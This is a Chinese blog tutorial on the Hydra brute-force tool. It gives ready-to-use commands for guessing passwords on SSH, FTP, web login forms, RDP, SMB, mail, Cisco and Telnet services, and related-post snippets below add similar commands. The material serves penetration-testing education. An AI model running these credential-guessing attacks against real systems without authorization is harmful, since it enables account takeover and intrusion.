hydra工具使用教程

已于 2024-04-18 16:56:44 修改
阅读量2.1k 收藏 8
点赞数 34
分类专栏: 安装教程 文章标签: 测试工具 web安全 网络安全
于 2023-11-22 19:21:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81113856/article/details/134560501
版权

  • Hydra介绍

        Hydra,也被称为“九头蛇”(根据希腊神话中的多头蛇怪物Hydra),是一款开源的渗透测试工具,专用于进行暴力破解和密码攻击。它支持多种协议和服务的破解,包括但不限于SSH、FTP、HTTP、HTTPS、HTTP-PROXY、LDAP、SMB、MSSQL、MYSQL、POSTGRES等。

  • Hydra安装

(一)Window环境

hydra-8.1-windows.zip解压后使用,通过cmd进入命令行,使用hydra -h查看是否安装成功

评论给你私发Windows版工具

(二)Linux环境

kali

1.在kali中打开终端,直接输入hydra,可以看到hydra的版本、参数、以及可以爆破的协议。

  • 实例

举个栗子 爆破SSH

用 -l 参数指定用户名,-p参数指定密码,后面直接跟目标的IP地址和协议。

hydra -l root -p 12345678 192.168.31.173 ssh

破解成功,直接显示结果。

其他类型密码破解

·1.破解ftp:

# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

        get方式提交,破解web登录:

# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

        post方式提交,破解web登录:

  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

<form action="index.php" method="POST">

<input type="text" name="name" /><BR><br>

<input type="password" name="pwd" /><br><br>

<input type="submit" name="sub" value="提交">

</form>

  假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

·2.破解https:

# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

·3.破解teamspeak:

# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

·4.破解cisco:

# hydra -P pass.txt 10.36.16.18 cisco

# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

·5.破解smb:

# hydra -l administrator -P pass.txt 10.36.16.18 smb

·6.破解pop3:

# hydra -l muts -P pass.txt my.pop3.mail pop3

·7.破解rdp:

# hydra ip rdp -l administrator -P pass.txt -V

·8.破解http-proxy:

# hydra -l admin -P pass.txt http-proxy://10.36.16.18

·9.破解imap:

# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

·10.破解telnet

# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

爱玩游戏的黑客
关注
  • 34
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
安全测试工具Hydra安装及其用法(用于爆破)
Snow_python的博客
03-03 3871
安装: windows:直接取github下载https://github.com/maaaaz/thc-hydra-windows linux:kali自带爆破工具,属于主流爆破工具 windows上下载完成后解压,然后再当前目录下打开cmd,输入hydra -h可以查看常用的命令 其中红色框内的两条指令最常用,L后面是账号集,P后面是密码集,注意大小写,大写代表文件。如果账号集中有m个账号...
网络安全 | 渗透工具Hydra安装使用详细教程
等风来
01-04 5727
Hydra,也称九头蛇,是一款非常强大的暴力破解工具(密码能否被破解关键在于字典是否足够强大),支持多种服务协议的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装。该工具支持以下协议的爆破:Hydra在kali中自带,这里介绍windows下的安装方法。zip下载地址:https://gitcode.com/maaaaz/thc-hydra-windows/tree/master下载完成后解压: 再将thc-hydra-windows-mast
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法
Hydra 8.1window s版本
01-11
THC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为研究人员和安全从业人员展示远程获取一个系统的认证权限是比较容易的! 新版本代码迁移到了github,增加了对redis的支持,以及增加SMB模块的unicode支持等等。 从8.0版本起,似乎官方只支持linux版的了,windows版的只能自己编译了,网上找了找,终于找了一个可用的最新版。。
网络安全 渗透工具Hydra工具安装、使用详析_hydra windows怎么安装(1)
最新发布
2401_84969389的博客
05-13 1153
Hydra,也称九头蛇,是一款非常强大的暴力破解工具(密码能否被破解关键在于字典是否足够强大),支持多种服务协议的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装。
hydra windows版
06-26
hydra渗透人员必备工具,基于协议爆破密码,能够爆破21,22,3389,1433,1521等并且附带使用说明。
hydra-8.2(windows).zip
06-24
先从第一个扫出来的21端口入手 首先hydra这个不是一个图形界面的软件,需要在命令行界面执行。但是连我这种英语小白都能用,大家就放心食用吧。 在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在此处打开powershell)。 ctrl+r 输入cmd 然后进到这个目录也是一样的。 解压即可无需安装。 在网上看有人说直接打hydra 就能用,但是我的是不行的,如下图。不知道是不是我的原因,我的是win10的用的命令行是PowerShell(感觉这个超级好用兼容了不少linux的命令) 。。。
hydra暴力破解ssh密码
热门推荐
记忆碎片
08-16 1万+
环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool。 下面是它支持的一些服务: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-
Window版NMAP扫描工具Hydra爆破工具安装及简单指令使用
与君共勉
11-20 3778
Hydra -l a -P e:\pass.txt 10.1.1.1 rdp(远程桌面服务,3389)Hydra -l a -P e:\pass.txt 10.1.1.1 smb(共享服务,445)Nmap -O (大写) 10.1.1.1 扫描目标系统版本,也有开发端口的一些情况;Nmap -p 21,23 10.1.1.1 -sV 扫描指定端口的服务版本;Nmap -p 21,23-25,3389 10.1.1.1 指定端口信息;Nmap -A 10.1.1.1 全面扫描。
第六天 01-hydra工具windows远程桌面的密码爆破
qq_56414082的博客
01-02 6981
RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。
记录一次 hydra爆破虚拟机win10 3389端口
qq_45752705的博客
05-23 1111
小白的渗透学习之路
Hydra 9.1【Windows版】(2020-08-2更新).rar
02-11
hydra -L 账户字典 -l 单个账户名 -p 单个密码 -P 密码字典 hydra爆破rdp:(前提是目标的远程连接可以访问) hydra -l Administrator -P password.txt rdp://192.168.1.111 hydra爆破mysql:(前提是目标的mysql可远程访问) hydra -l root -P password.txt 192.168.1.111 mysql hydra爆破sql server:(前提是目标的mysql可远程访问) hydra -l sa -P password.txt 192.168.1.111 mssql hydra爆破http:( http-get or http-form-post.) hydra -l admin -P password.txt 192.168.1.111 http-get /login.php hydra -l admin -P password.txt 192.168.213.135 http-form-post "/dvwa/login.php:user=^
windows下hydra-8.1
09-13
windows下可以用的密码破解工具,最新版8.1
hydra-linux
09-12
linxu hydra工具,文件内包含安装和使用教程以及启动脚本
Kali使用手册top10工具part1
10-13
Kali使用手册top10工具part1 hydra john maltego
hydra-examples:学习Hydra的示例和演示代码
05-06
Hydra使用JavaScript时,其结构几乎不需要任何JavaScript知识。 如果您来自另一种语言,或者是编程新手,则可以在Hydra中构建非常有趣的视觉效果。 本质上,Hydra接受输入→对其进行修改→返回输出。 安装九头蛇 ...
hydra_quintup_analyses
03-26
6. 文档与教程:详细解释每个部分的功能和使用方法,帮助新用户快速上手。 7. 自动化脚本:可能包含批处理脚本,用于自动化处理大量分子的FEP分析。 综上所述,“hydra_quintup_analyses”是针对五重FEP模拟的高效...
Windows下hydra(海德拉/九头蛇)暴力猜解RDP的简单渗透实践
qq_44846097的博客
03-20 420
Windows下hydra(海德拉/九头蛇)暴力猜解RDP的简单渗透实践
hydra简介(windows使用)
weixin_46447549的博客
11-02 3005
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库
hydra工具windows班本哪下载
09-01
要下载Hydra工具Windows版本,你可以访问以下网站:https://github.com/vanhauser-thc/thc-hydra/releases 在这个网站上,你可以找到Hydra工具的各个版本和操作系统的适配版本。找到适用于Windows操作系统的版本,然后点击下载链接。通常,你会找到一个.exe文件,这是Hydra工具的可执行文件。 下载完成后,你可以将该文件保存在你选择的位置。然后,运行该文件以安装和配置Hydra工具。在安装过程中,你可能需要提供管理员权限以完成安装。安装完成后,你就可以使用Hydra工具来执行网络渗透测试或其他任务。 需要注意的是,Hydra工具的使用需要一定的技术知识和合法授权。确保你遵守相关的法律和道德准则,并只在合法的环境中使用该工具

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值